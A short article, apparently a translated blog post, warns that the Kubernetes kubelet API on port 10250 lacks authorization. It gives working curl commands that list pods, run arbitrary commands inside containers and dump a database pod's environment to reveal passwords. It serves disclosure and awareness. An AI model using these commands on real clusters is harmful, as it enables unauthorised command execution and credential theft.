Caution for Kubernetes Users

The kubelet service, with which apiserver closely communicates, listens to port 10250. Although this port uses certificates, it only for channel encryption does not have any authorization on it.

This problem has been known for a long time, but for some reason no one considers it serious. Links to the discussion:

https://github.com/kubernetes/kubernetes/issues/3168
https://github.com/kubernetes/kubernetes/issues/7965
https://github.com/kubernetes/kubernetes/issues/11816

What can be done with this? Almost everything. No registration and sms.

Get a list of all pods:

 $ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool

Run a command inside a container? Easily:

 $ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"

Get a password to the database? Easy peasy:

 $ curl -k -XPOST "https://k8s-node-1:10250/run/default/mysql-epg0f/mysql" -d 'cmd=env'

Pulling data out of it is also not difficult.

Source: https://habr.com/ru/post/308628/

All Articles

Caution for Kubernetes Users

More articles: